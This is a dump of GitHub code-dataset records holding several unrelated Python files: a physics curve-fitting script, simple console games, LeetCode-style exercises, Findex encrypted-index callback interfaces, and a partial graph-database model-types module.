np.linspace(min(y_10), max(y_10), 100)\nplt.plot(x_range_10, gaussian(x_range_10, a_10, b_10, c_10), label='Ajuste 10 $\\mu Ci$ em cima', color='blue')\n\n# Plot dos dados, curva ajustada e erros para Rc_5\nplt.errorbar(y_5, Rc_5, yerr=eRc_5, label=f'5 $\\mu Ci$ em cima', capsize=1, markersize=2, ecolor='green', color='green', fmt='.')\nx_range_5 = np.linspace(min(y_5), max(y_5), 100)\nplt.plot(x_range_5, gaussian(x_range_5, a_5, b_5, c_5), label='Ajuste 5 $\\mu Ci$ em cima', color='brown')\n\nplt.grid(True)\nplt.legend()\nplt.xlabel('z [mm]')\nplt.ylabel(f'$R_c$ [1/s]')\nplt.show()\n\n# Imprimir os resultados\nprint(\"Valores dos parâmetros para 10 µCi em cima:\")\nprint(f\"a_10: {a_10}\")\nprint(f\"b_10: {b_10}\")\nprint(f\"c_10: {c_10}\")\nprint(\"\\nValores dos parâmetros para 5 µCi em cima:\")\nprint(f\"a_5: {a_5}\")\nprint(f\"b_5: {b_5}\")\nprint(f\"c_5: {c_5}\")\nprint(\"\\nQui-quadrado e ndf para 10 µCi em cima:\")\nprint(f\"Qui-quadrado_10: {chi_squared_10}\")\nprint(f\"ndf_10: {ndf_10}\")\nprint(\"\\nQui-quadrado e ndf para 5 µCi em cima:\")\nprint(f\"Qui-quadrado_5: {chi_squared_5}\")\nprint(f\"ndf_5: {ndf_5}\")\n\n\n# Converta os parâmetros em números incertos\nparams_10_unc = unc.correlated_values(params_10, covariance_10)\nparams_5_unc = unc.correlated_values(params_5, covariance_5)\n\n# Imprima os resultados com duas casas decimais\nprint(\"Valores dos parâmetros para 10 µCi em cima:\")\nprint(f\"a_10: {params_10_unc[0].nominal_value:.2f} ± {params_10_unc[0].std_dev:.2f}\")\nprint(f\"b_10: {params_10_unc[1].nominal_value:.2f} ± {params_10_unc[1].std_dev:.2f}\")\nprint(f\"c_10: {params_10_unc[2].nominal_value:.2f} ± {params_10_unc[2].std_dev:.2f}\")\nprint(\"\\nValores dos parâmetros para 5 µCi em cima:\")\nprint(f\"a_5: {params_5_unc[0].nominal_value:.2f} ± 
{params_5_unc[0].std_dev:.2f}\")\nprint(f\"b_5: {params_5_unc[1].nominal_value:.2f} ± {params_5_unc[1].std_dev:.2f}\")\nprint(f\"c_5: {params_5_unc[2].nominal_value:.2f} ± {params_5_unc[2].std_dev:.2f}\")","repo_name":"C3N0UR4S/LFEA_II","sub_path":"Sessao_6/altura.py","file_name":"altura.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24231095863","text":"from enum import Enum\nimport random\n\nclass mmenu(Enum):\n    Lnum = '1'\n    Rock = '2'\n    Exit = '0'\nclass rmenu(Enum):\n    PwB = '1'\n    PwP = '2'\n    Exit = '0'\n\nclass choice(Enum):\n    Rock = 1\n    Paper = 2\n    Scissor = 3\n\n\ndef PB():\n    while True:\n        Bchoice = random.randint(1,3) #Bchoice = Bot Choice\n        pn = input('Enter your name or press 0 and enter to go back:') #pn = PlayerName\n        if pn == '0':\n            print('Thank you for playing')\n            break\n        print(f'Player Name:{pn}')\n        print('1.Rock')\n        print('2.Paper')\n        print('3.Scissor')\n        Pchoice = input('Enter your choice:') #Pchoice = Player Choice\n        Pchoice = int(Pchoice)\n        print(f'Bot answer is {choice(Bchoice).name}')\n        if Pchoice == Bchoice:\n            print('Draw, nobody wins')\n        elif Bchoice == choice.Rock.value:\n            if Pchoice == choice.Paper.value:\n                print(f'{pn} win the game')\n            elif Pchoice == choice.Scissor.value:\n                print('Bot win the game')\n        elif Bchoice == choice.Paper.value:\n            if Pchoice == choice.Scissor.value:\n                print(f'{pn} win the game')\n            elif Pchoice == choice.Rock.value:\n                print('Bot win the game')\n        elif Bchoice == choice.Scissor.value:\n            if Pchoice == choice.Rock.value:\n                print(f'{pn} win the game')\n            elif Pchoice == choice.Paper.value:\n                print('Bot win the game')\n    return\n\n\ndef PP():\n    while True:\n        print('If you want to go back just press 0 and enter ^_^')\n        Np1 = input('Enter your name Player1:') #Np1 = Name Player 1\n        Np2 = input('Enter your name Player2:') #Np2 = Name Player 2\n        if Np1 == '0' or Np2 == '0':\n            break\n        print('1.Rock')\n        print('2.Paper')\n        print('3.Scissor')\n        print('Please enter your choice:')\n        P1choice = int(input(f'{Np1}:')) #P1choice = Player 1 Choice\n        P2choice = int(input(f'{Np2}:')) #P2choice = Player 2 Choice\n        if P1choice == P2choice:\n            print('Draw, nobody wins')\n        elif P1choice == choice.Rock.value:\n            if P2choice == choice.Paper.value:\n                print(f'{Np2} win the game')\n            elif P2choice == choice.Scissor.value:\n                print(f'{Np1} win the game')\n        elif P1choice == choice.Paper.value:\n            if P2choice == choice.Rock.value:\n                print(f'{Np1} win the game')\n            elif P2choice == choice.Scissor.value:\n                print(f'{Np2} win the game')\n        elif P1choice == choice.Scissor.value:\n            if P2choice == choice.Paper.value:\n                print(f'{Np1} win the game')\n            elif P2choice == choice.Rock.value:\n                print(f'{Np2} win the game')\n    return\n\n\ndef LuckyGame1():\n    while True:\n        Num = input('Enter number from 1-100 or Press 0 and Enter to exit:')\n        Num = int(Num)\n        RanNum = random.randint(1,100)\n        if Num == 0:\n            break\n        elif Num == RanNum:\n            print('----------')\n            print('You win')\n            print('----------')\n        else:\n            print('-'*47)\n            print('You lose')\n            print(f'The Number is {RanNum} But your number is {Num}')\n            print('-'*47)\n    return\n\n\ndef RockGame2():\n    print('Welcome to rock paper and scissors game')\n    while True:\n        print('1.Play with Bot')\n        print('2.Play with your Partner')\n        print('0.Exit')\n        Rmenu = input('>>>')\n        if Rmenu == rmenu.PwB.value: #PwB = Play With Bot\n            PB()\n        elif Rmenu == rmenu.PwP.value: #PwP = Play with Player\n            PP()\n        elif Rmenu == 
rmenu.Exit.value:\n break\n return\n\n\ndef MainMenu():\n print('Welcome to the jungle Game')\n while True:\n print('Choose the game you want to play')\n print('1.Lucky Number')\n print('2.Rock Paper Scissor')\n print('0.Exit')\n Mmenu = input('>>>')\n if Mmenu == mmenu.Lnum.value:\n LuckyGame1()\n elif Mmenu == mmenu.Rock.value:\n RockGame2()\n elif Mmenu == mmenu.Exit.value:\n break\n return\n\n\nMainMenu()","repo_name":"OukVichheka/file-home-koompi-hello-Contact.py","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15552658306","text":"'''\nGiven an array of integers nums sorted in ascending order, \nfind the starting and ending position of a given target value.\n\nIf target is not found in the array, return [-1, -1].\n\nFollow up: Could you write an algorithm with O(log n) runtime complexity?\n\nExample 1:\n\nInput: nums = [5,7,7,8,8,10], target = 8\nOutput: [3,4]\n\nExample 2:\n\nInput: nums = [5,7,7,8,8,10], target = 6\nOutput: [-1,-1]\n\nExample 3:\n\nInput: nums = [], target = 0\nOutput: [-1,-1]\n'''\ndef binary_search(arr, low, high, x): \n \n mid = (high + low) // 2\n\n # If element is present at the middle itself \n if arr[mid] == x: \n return mid \n\n # If element is smaller than mid, then it can only \n # be present in left subarray \n elif arr[mid] > x: \n return binary_search(arr, low, mid - 1, x) \n\n # Else the element can only be present in right subarray \n else: \n return binary_search(arr, mid + 1, high, x) \n\n\ndef searchRange(nums, target: int):\n\n if target not in nums:\n return [-1, -1]\n else:\n\n if len(nums) == 1:\n return [0, 0]\n\n high = len(nums) - 1\n low = 0\n center = (binary_search(nums, low, high, target))\n # print(center)\n c1 = center\n while nums[c1] == target:\n if c1 == low:\n first = c1\n break\n else:\n first = c1\n c1 = c1 - 1\n\n c2 = center\n while nums[c2] == target:\n if c2 == high:\n last = high\n break\n else:\n last = c2\n c2 = c2 + 1\n\n if \"last\" not in locals():\n last = center\n if \"first\" not in locals():\n first = center\n return [first, last]\n\nnums = [5,7,7,8,8,10]\ntarget = 8\nprint(searchRange(nums, target))\n\nnums = [2, 2]\ntarget = 2\nprint(searchRange(nums, target)) \n\n'''\nnums = [5,7,7,8,8,10]\ntarget = 6\nsearchRange(nums, target)\n\nnums = []\ntarget = 0\nsearchRange(nums, target)\n'''\n","repo_name":"qscez2001/leetcode","sub_path":"34_Find_First_Last.py","file_name":"34_Find_First_Last.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5624637646","text":"from random import random\nfrom math import floor\n\ndef random_reorder(l):\n # just iterate throught the list,\n # swap each item with another one in a random index and...\n # reach the end of the list, done.\n\n if len(l) < 2: # if length is 1 or 0, do nothing.\n return\n\n for i in range(0, len(l)):\n if random() > 0.1: # sometimes you skip an item to add more randomness (1/10 chance of skipping)\n random_index = floor(random() * len(l) )\n temp = l[i]\n l[i] = l[random_index]\n l[random_index] = temp\n \n\nx = [1,2,3,4,5,6,7,8]\n\nrandom_reorder(x)\nprint(x)","repo_name":"sam-val/algorithmic-problems","sub_path":"random_reorder_array.py","file_name":"random_reorder_array.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"16793490593","text":"# -*- coding: utf-8 -*-\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Callable, Dict, List, Optional, Sequence, Set, Tuple, Union\n\nfrom cloudproof_findex import (\n IndexedValuesAndKeywords,\n InternalFindex,\n Keyword,\n Label,\n Location,\n MasterKey,\n ProgressResults,\n SearchResults,\n)\n\n\nclass FindexBase(metaclass=ABCMeta):\n def __init__(self) -> None:\n self.findex_core = InternalFindex()\n\n\nclass FindexUpsert(FindexBase, metaclass=ABCMeta):\n \"\"\"Implement this class to use Findex Upsert API\"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.findex_core.set_upsert_callbacks(\n self.fetch_entry_table,\n self.upsert_entry_table,\n self.insert_chain_table,\n )\n\n def upsert(\n self,\n master_key: MasterKey,\n label: Label,\n additions: IndexedValuesAndKeywords,\n deletions: IndexedValuesAndKeywords,\n ) -> Set[Keyword]:\n \"\"\"Upserts the given relations between `IndexedValue` and `Keyword` into Findex tables.\n\n Args:\n master_key (MasterKey): the user master key\n label (Label): label used to allow versioning\n additions (Dict[Location | Keyword, List[Keyword | str]]):\n map of `IndexedValue` to a list of `Keyword` to add to the index\n deletions (Dict[Location | Keyword, List[Keyword | str]]):\n map of `IndexedValue` to a list of `Keyword` to delete from the index\n \"\"\"\n return self.findex_core.upsert_wrapper(master_key, label, additions, deletions)\n\n @abstractmethod\n def fetch_entry_table(\n self, entry_uids: List[bytes]\n ) -> Sequence[Tuple[bytes, bytes]]:\n \"\"\"Query the Entry Table.\n\n Args:\n entry_uids (List[bytes], optional): uids to query. if None, return the entire table\n\n Returns:\n Sequence[Tuple[bytes, bytes]]: uid -> value mapping\n \"\"\"\n\n @abstractmethod\n def upsert_entry_table(\n self, entry_updates: Dict[bytes, Tuple[bytes, bytes]]\n ) -> Dict[bytes, bytes]:\n \"\"\"Update key-value pairs in the Entry Table.\n\n Args:\n entry_updates (Dict[bytes, Tuple[bytes, bytes]]): uid -> (old_value, new_value)\n\n Returns:\n Dict[bytes, bytes]: entries that failed update (uid -> current value)\n \"\"\"\n\n @abstractmethod\n def insert_chain_table(self, chain_items: Dict[bytes, bytes]) -> None:\n \"\"\"Insert new key-value pairs in the Chain Table.\n\n Args:\n chain_items (Dict[bytes, bytes]): uid -> value mapping to insert\n \"\"\"\n\n\nclass FindexSearch(FindexBase, metaclass=ABCMeta):\n \"\"\"Implement this class to use Findex Search API\"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.findex_core.set_search_callbacks(\n self.fetch_entry_table, self.fetch_chain_table\n )\n\n @abstractmethod\n def fetch_entry_table(\n self, entry_uids: List[bytes]\n ) -> Sequence[Tuple[bytes, bytes]]:\n \"\"\"Query the Entry Table.\n\n Args:\n entry_uids (List[bytes], optional): uids to query. 
if None, return the entire table\n\n Returns:\n Sequence[Tuple[bytes, bytes]]: uid -> value mapping\n \"\"\"\n\n @abstractmethod\n def fetch_chain_table(self, chain_uids: List[bytes]) -> Dict[bytes, bytes]:\n \"\"\"Query the Chain Table.\n\n Args:\n chain_uids (List[bytes]): uids to query\n\n Returns:\n Dict[bytes, bytes]: uid -> value mapping\n \"\"\"\n\n def search(\n self,\n master_key: MasterKey,\n label: Label,\n keywords: Sequence[Union[Keyword, str]],\n progress_callback: Optional[Callable[[ProgressResults], bool]] = None,\n ) -> SearchResults:\n \"\"\"Recursively search Findex graphs for `Locations` corresponding to the given `Keyword`.\n\n Args:\n keywords (List[Keyword | str]): keywords to search using Findex.\n master_key (MasterKey): user secret key.\n label (Label): public label used in keyword hashing.\n progress_callback (Callable[[Dict[str, List[IndexedValue]]], bool], optional): callback\n to process intermediate search results.\n\n Returns:\n Dict[Keyword, List[Location]]: `Locations` found by `Keyword`\n \"\"\"\n return self.findex_core.search_wrapper(\n master_key,\n label,\n keywords,\n progress_callback,\n )\n\n\nclass FindexCompact(FindexBase, metaclass=ABCMeta):\n \"\"\"Implement this class to use Findex Compact API\"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.findex_core.set_compact_callbacks(\n self.fetch_entry_table,\n self.fetch_chain_table,\n self.update_lines,\n self.list_removed_locations,\n self.fetch_all_entry_table_uids,\n )\n\n @abstractmethod\n def fetch_entry_table(\n self, entry_uids: List[bytes]\n ) -> Sequence[Tuple[bytes, bytes]]:\n \"\"\"Query the Entry Table.\n\n Args:\n entry_uids (List[bytes]): uids to query\n\n Returns:\n Sequence[Tuple[bytes, bytes]]: uid -> value mapping\n \"\"\"\n\n @abstractmethod\n def fetch_all_entry_table_uids(self) -> Set[bytes]:\n \"\"\"Return all UIDs in the Entry Table.\n\n Returns:\n Set[bytes]: uid set\n \"\"\"\n\n @abstractmethod\n def fetch_chain_table(self, chain_uids: List[bytes]) -> Dict[bytes, bytes]:\n \"\"\"Query the Chain Table.\n\n Args:\n chain_uids (List[bytes]): uids to query\n\n Returns:\n Dict[bytes, bytes]: uid -> value mapping\n \"\"\"\n\n @abstractmethod\n def insert_chain_table(self, chain_items: Dict[bytes, bytes]) -> None:\n \"\"\"Insert new key-value pairs in the Chain Table.\n\n Args:\n chain_items (Dict[bytes, bytes]): uid -> value mapping to insert\n \"\"\"\n\n @abstractmethod\n def insert_entry_table(self, entries_items: Dict[bytes, bytes]) -> None:\n \"\"\"Insert new key-value pairs in the Entry Table.\n\n Args:\n entries_items (Dict[bytes, bytes]): uid -> value mapping to insert\n \"\"\"\n\n @abstractmethod\n def remove_entry_table(self, entry_uids: Optional[List[bytes]] = None) -> None:\n \"\"\"Remove entries from Entry Table.\n\n Args:\n entry_uids (List[bytes], optional): uid of entries to delete. 
if None,\n delete all entries\n \"\"\"\n\n @abstractmethod\n def remove_chain_table(self, chain_uids: List[bytes]) -> None:\n \"\"\"Remove entries from Chain Table.\n\n Args:\n chain_uids (List[bytes]): uids to remove from the chain table\n \"\"\"\n\n @abstractmethod\n def list_removed_locations(self, locations: List[Location]) -> List[Location]:\n \"\"\"Check whether the given `Locations` still exist.\n\n Args:\n locations (List[Location]): `Locations` to check\n\n Returns:\n List[Location]: list of `Locations` that were removed\n \"\"\"\n\n def update_lines(\n self,\n removed_chain_table_uids: List[bytes],\n new_encrypted_entry_table_items: Dict[bytes, bytes],\n new_encrypted_chain_table_items: Dict[bytes, bytes],\n ) -> None:\n \"\"\"Example implementation of the compact callback\n\n Update the database with the new values.\n This function should:\n\n - removes all the Entry Table;\n - removes `chain_table_uids_to_remove` from the Chain Table;\n - inserts `new_chain_table_items` into the Chain Table;\n - inserts `new_entry_table_items` into the Entry Table.\n\n The order of these operations is not important but has some\n implications. This implementation keeps the database small but prevents\n using the index during the `update_lines`.\n\n Override this method if you want another implementation, e.g. :\n\n 1. saves all Entry Table UIDs;\n 2. inserts `new_chain_table_items` into the Chain Table;\n 3. inserts `new_entry_table_items` into the Entry Table;\n 4. publish new label to users;\n 5. remove old lines from the Entry Table (using the saved UIDs in 1.);\n 6. removes `chain_table_uids_to_remove` from the Chain Table.\n\n With this implementation, the index tables are much bigger during a small duration,\n but users can continue using the index during the `update_lines`.\n \"\"\"\n\n self.remove_entry_table()\n self.remove_chain_table(removed_chain_table_uids)\n self.insert_chain_table(new_encrypted_chain_table_items)\n self.insert_entry_table(new_encrypted_entry_table_items)\n\n def compact(\n self,\n master_key: MasterKey,\n new_master_key: MasterKey,\n new_label: Label,\n num_reindexing_before_full_set: int,\n ) -> None:\n \"\"\"Performs compacting on the entry and chain tables.\n\n Args:\n num_reindexing_before_full_set (int): number of compacting to do before\n being sure that a big portion of the indexes were checked\n master_key (MasterKey): current master key\n new_master_key (MasterKey): newly generated key\n new_label (Label): newly generated label\n \"\"\"\n self.findex_core.compact_wrapper(\n master_key, new_master_key, new_label, num_reindexing_before_full_set\n )\n","repo_name":"Cosmian/cloudproof_python","sub_path":"src/cloudproof_py/findex/Findex.py","file_name":"Findex.py","file_ext":"py","file_size_in_byte":9482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71709962027","text":"import dataclasses\nimport keyword\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import ClassVar, Dict, List, Optional, Set, Tuple, Union, cast\nfrom uuid import UUID, uuid4\n\nimport humps # type: ignore\nimport marshmallow # type: ignore\nfrom marshmallow import ( # type: ignore\n ValidationError,\n fields,\n post_load,\n pre_dump,\n validates,\n)\nfrom more_itertools import partition # type: ignore\n\nfrom core import types as t\nfrom core.json import CamelCaseSchema, Serializable\nfrom core.util import is_datetime, normalize_datetime\n\nfrom .. 
import errors as err\nfrom . import datatypes as dt\nfrom .datatypes import into_uuid\nfrom .util import (\n RESERVED_PREFIX,\n is_reserved_model_name,\n is_reserved_property_name,\n strip_reserved_prefix,\n)\n\n\ndef get_organization_id(thing: object) -> t.OrganizationId:\n \"\"\"\n Extract an organization ID from an input value.\n\n Raises\n ------\n InvalidOrganizationError\n \"\"\"\n if isinstance(thing, int):\n return t.OrganizationId(thing)\n try:\n int_id = int(thing) # type: ignore\n return t.OrganizationId(int_id)\n except ValueError:\n raise err.InvalidOrganizationError(id=str(thing))\n\n\ndef get_dataset_id(thing: object) -> t.DatasetId:\n \"\"\"\n Extract an dataset ID from an input value.\n\n Raises\n ------\n InvalidDatasetError\n \"\"\"\n if isinstance(thing, int):\n return t.DatasetId(thing)\n try:\n int_id = int(thing) # type: ignore\n return t.DatasetId(int_id)\n except ValueError:\n raise err.InvalidDatasetError(id=str(thing))\n\n\ndef get_model_id(thing: Union[\"Model\", t.ModelId, UUID, str]) -> t.ModelId:\n \"\"\"\n Given a `Model` or an model ID, return a model ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.ModelId(thing)\n elif isinstance(thing, Model):\n return thing.id\n return t.ModelId(UUID(thing))\n\n\nis_model_id = dt.is_uuid\n\n\ndef get_model_property_id(\n thing: Union[\"ModelProperty\", t.ModelPropertyId, UUID, str]\n) -> t.ModelPropertyId:\n \"\"\"\n Given a `ModelProperty` or an model property ID, return a model property ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.ModelPropertyId(thing)\n elif isinstance(thing, ModelProperty):\n return thing.id\n return t.ModelPropertyId(UUID(thing))\n\n\nis_model_property_id = dt.is_uuid\n\n\ndef get_record_id(thing: Union[\"Record\", t.RecordId, UUID, str]) -> t.RecordId:\n \"\"\"\n Given a `Record` or an record ID, return a record ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.RecordId(thing)\n elif isinstance(thing, Record):\n return thing.id\n return t.RecordId(UUID(thing))\n\n\nis_record_id = dt.is_uuid\n\n\ndef get_model_relationship_id(\n thing: Union[\"ModelRelationship\", t.ModelRelationshipId, UUID, str]\n) -> t.ModelRelationshipId:\n \"\"\"\n Given a `ModelRelationship` or a relationship ID, return a relationship ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.ModelRelationshipId(thing)\n elif isinstance(thing, ModelRelationship):\n return thing.id\n return t.ModelRelationshipId(UUID(thing))\n\n\nis_model_relationship_id = dt.is_uuid\n\n# UUIDs have 36 characters\nUUID_LENGTH = 36\n\n\ndef normalize_relationship_type(relationship_name: str) -> str:\n \"\"\"\n Normalizes a relationship name to upper-snake-case.\n\n If the relationship name has a UUID suffix added by the Python client\n or frontend, it is removed.\n\n This also helps dealing with the Neo4j relationship type limitation of max\n of 65K unique names.\n\n Examples\n --------\n - \"\"belongs_to_478e215d-04ec-4cdf-ac8b-d5289601c9f7\" -> \"BELONGS_TO\"\n \"\"\"\n from .validate import validate_relationship_name\n\n validate_relationship_name(relationship_name)\n\n if (\n len(relationship_name) > UUID_LENGTH + 1\n and relationship_name[-(UUID_LENGTH + 1)] == \"_\"\n and dt.is_uuid(relationship_name[-UUID_LENGTH:])\n ):\n relationship_name = relationship_name[: -(UUID_LENGTH + 1)]\n\n return relationship_name.replace(\"/\", \"_\").replace(\".\", \"_\").upper().strip()\n\n\ndef get_relationship_type(\n r: Union[\"ModelRelationship\", t.RelationshipType, t.RelationshipName, str]\n) -> t.RelationshipType:\n \"\"\"\n Transform 
and format a string into a relationship type.\n\n A relationship type is the canonical representation of a relationship\n in Neo4j: a typeful, an upper-snake-cased name.\n\n Examples\n --------\n - \"foo\" -> \"FOO\"\n - \"DoctorVisit\" -> \"DOCTOR_VISIT\"\n - \"tHiS_IsATesT\" -> \"THIS_IS_A_TEST\"\n \"\"\"\n relationship_type = r.type if isinstance(r, ModelRelationship) else r\n return t.RelationshipType(normalize_relationship_type(relationship_type))\n\n\ndef get_record_relationship_id(\n thing: Union[\"RecordRelationship\", t.RecordRelationshipId, UUID, str]\n) -> t.RecordRelationshipId:\n \"\"\"\n Given a `RecordRelationship` or a relationship ID, return a typed\n relationship ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.RecordRelationshipId(thing)\n elif isinstance(thing, RecordRelationship):\n return thing.id\n return t.RecordRelationshipId(UUID(thing))\n\n\nis_record_relationship_id = dt.is_uuid\n\n\ndef get_package_proxy_id(\n r: Union[\"PackageProxy\", t.PackageProxyId, UUID, str]\n) -> t.PackageProxyId:\n \"\"\"\n Given a `PackageProxy` or an PackageProxy ID, return a PackageProxy ID.\n \"\"\"\n if isinstance(r, UUID):\n return t.PackageProxyId(r)\n elif isinstance(r, PackageProxy):\n return t.PackageProxyId(r.id)\n return t.PackageProxyId(UUID(r))\n\n\nis_package_proxy_id = dt.is_uuid\n\n###############################################################################\n\n\nclass OrderDirection(str, Enum):\n ASC = \"asc\"\n DESC = \"desc\"\n\n @classmethod\n def parse(cls, s: str) -> \"OrderDirection\":\n return OrderDirection(s.strip().lower())\n\n\n# Order by\n\n\n@dataclass(frozen=True)\nclass OrderBy:\n @classmethod\n def field(cls, name: str, ascending: bool = True) -> \"OrderBy\":\n return OrderByField(name=name, ascending=ascending)\n\n @property\n def is_field(self) -> bool:\n return False\n\n @classmethod\n def relationship(cls, type: str, ascending: bool = True) -> \"OrderBy\":\n return OrderByRelationship(type=type, ascending=ascending)\n\n @property\n def is_relationship(self) -> bool:\n return False\n\n\n@dataclass(frozen=True)\nclass OrderByField(OrderBy):\n\n CREATED_AT_FIELDS: ClassVar[Set[str]] = set(\n [\n \"~created_at\",\n \"created_at\",\n \"createdAt\",\n \"$created_at\",\n \"$createdAt\",\n RESERVED_PREFIX + \"created_at\",\n RESERVED_PREFIX + \"createdAt\",\n ]\n )\n UPDATED_AT_FIELDS: ClassVar[Set[str]] = set(\n [\n \"~updated_at\",\n \"updated_at\",\n \"updatedAt\",\n \"$updated_at\",\n \"$updatedAt\",\n RESERVED_PREFIX + \"updated_at\",\n RESERVED_PREFIX + \"updatedAt\",\n ]\n )\n\n name: str\n ascending: bool = field(default=True)\n\n @property\n def is_field(self) -> bool:\n return True\n\n @property\n def is_created_at(self) -> bool:\n name = self.name.strip()\n return name in self.CREATED_AT_FIELDS or name.lower() in self.CREATED_AT_FIELDS\n\n @property\n def is_updated_at(self) -> bool:\n name = self.name.strip()\n return name in self.UPDATED_AT_FIELDS or name.lower() in self.UPDATED_AT_FIELDS\n\n @property\n def direction(self) -> OrderDirection:\n if self.ascending:\n return OrderDirection.ASC\n else:\n return OrderDirection.DESC\n\n\n@dataclass(frozen=True)\nclass OrderByRelationship(OrderBy):\n\n SUPPORTED_LABELS: ClassVar[Set[str]] = set(\n [\n \"~label\",\n \"label\",\n \"$label\",\n RESERVED_PREFIX + \"label\",\n \"type\",\n \"$type\",\n RESERVED_PREFIX + \"type\",\n ]\n )\n\n type: str\n ascending: bool = field(default=True)\n\n @property\n def is_relationship(self) -> bool:\n return True\n\n @property\n def is_supported_type(self) 
-> bool:\n \"\"\"\n Only relationship labels (types) are supported for sorting.\n \"\"\"\n t = self.type.strip()\n return t in self.SUPPORTED_LABELS or t.lower() in self.SUPPORTED_LABELS\n\n\n###############################################################################\n\n\nclass FromNodeMixin:\n @classmethod\n def _is_reserved(cls, t: Tuple[str, t.GraphValue]) -> bool:\n k, _ = t\n return is_reserved_property_name(k)\n\n @classmethod\n def from_node(cls, **data) -> object:\n defined_properties = set([f.name for f in dataclasses.fields(cls)])\n\n # Partition all reserved properties (those whose name begin with the\n # RESERVED_PREFIX character), and user-settable properties:\n user_props, reserved_props = partition(cls._is_reserved, data.items())\n\n props = {humps.decamelize(k): v for k, v in user_props}\n for k, v in reserved_props:\n kk = strip_reserved_prefix(humps.decamelize(k))\n if kk in defined_properties:\n props[kk] = v\n\n # Append '_' to any kwargs that are a reserved word:\n for k in props:\n if keyword.iskeyword(k):\n props[k + \"_\"] = props.pop(k)\n\n return cls(**props) # type: ignore\n\n\nclass DatasetSchema(CamelCaseSchema):\n id = fields.Integer()\n node_id = fields.String(allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return PropertyValue(**data)\n\n\n@dataclass(frozen=True)\nclass Dataset(Serializable):\n\n __schema__: ClassVar[DatasetSchema] = DatasetSchema(unknown=marshmallow.EXCLUDE)\n\n PUBLIC: ClassVar[Set[str]] = set([\"id\", \"node_id\"])\n\n id: t.DatasetId\n node_id: Optional[str] = field(default=None)\n\n @classmethod\n def from_node(cls, data) -> \"Dataset\":\n\n id = t.DatasetId(data[\"id\"])\n node_id: Optional[str] = data.get(\"node_id\")\n\n return Dataset(id=id, node_id=node_id)\n\n\n@dataclass(frozen=True)\nclass Package(Serializable):\n id: int\n node_id: str\n\n\nclass ModelSchema(CamelCaseSchema):\n id = fields.UUID()\n name = fields.String()\n display_name = fields.String()\n description = fields.String()\n count = fields.Integer(default=0)\n created_at = fields.DateTime(format=\"iso\")\n updated_at = fields.DateTime(format=\"iso\")\n created_by = fields.String()\n updated_by = fields.String()\n template_id = fields.UUID(required=False, allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return Model(**data)\n\n\n@dataclass(frozen=True)\nclass Model(FromNodeMixin, Serializable):\n\n __schema__: ClassVar[ModelSchema] = ModelSchema(unknown=marshmallow.EXCLUDE)\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"id\", \"name\", \"display_name\", \"description\", \"template_id\"]\n )\n\n id: t.ModelId\n name: str\n display_name: str\n description: str\n count: int\n created_at: datetime\n updated_at: datetime\n created_by: t.UserNodeId\n updated_by: t.UserNodeId\n template_id: Optional[UUID] = field(default=None)\n\n @validates(\"name\")\n def validate_name(self, name):\n # HACK: this validation is defined as a method to work around a\n # circular import between `models.validation` and `models.types`\n from .validate import validate_model_name\n\n try:\n validate_model_name(name)\n except err.ModelNameValidationError as e:\n raise ValidationError from e\n\n def __post_init__(self):\n # Needed since neotime.DateTime does not work with Python copy.deepcopy\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass ModelPropertySchema(CamelCaseSchema):\n name 
= fields.String(required=True)\n display_name = fields.String(required=True)\n data_type = fields.Function(\n required=True,\n serialize=lambda o: o.data_type.to_dict(),\n deserialize=dt.deserialize,\n )\n description = fields.String(required=False)\n index = fields.Integer(required=False, default=0)\n locked = fields.Boolean(required=False, default=False)\n required = fields.Boolean(required=False, default=False)\n model_title = fields.Boolean(required=False, default=False)\n # If True, show this property as a column in tables of records\n default = fields.Boolean(required=False, default=True)\n default_value = fields.Raw(required=False, allow_none=True)\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n id = fields.UUID(required=False, allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return ModelProperty(**data)\n\n\n@dataclass(frozen=True)\nclass ModelProperty(FromNodeMixin, Serializable):\n \"\"\"\n A property on a model represented using a node and modelled as\n\n (m:Model)--[r:MODEL_RELATIONSHIP_TYPE]->(p:ModelProperty)\n \"\"\"\n\n IMMUTABLE: ClassVar[Set[str]] = set([\"name\", \"data_type\"])\n PUBLIC: ClassVar[Set[str]] = set(\n [\n \"id\",\n \"name\",\n \"display_name\",\n \"data_type\",\n \"description\",\n \"index\",\n \"locked\",\n \"required\",\n \"model_title\",\n \"default_value\",\n \"default\",\n ]\n )\n\n __schema__: ClassVar[ModelPropertySchema] = ModelPropertySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n name: str\n display_name: str\n data_type: dt.DataType\n description: str = field(default=\"\")\n index: int = field(default=0)\n locked: bool = field(default=False)\n required: bool = field(default=False)\n model_title: bool = field(default=False)\n default: bool = field(default=True)\n default_value: Optional[t.GraphValue] = field(default=None)\n created_at: datetime = field(default_factory=datetime.now)\n updated_at: datetime = 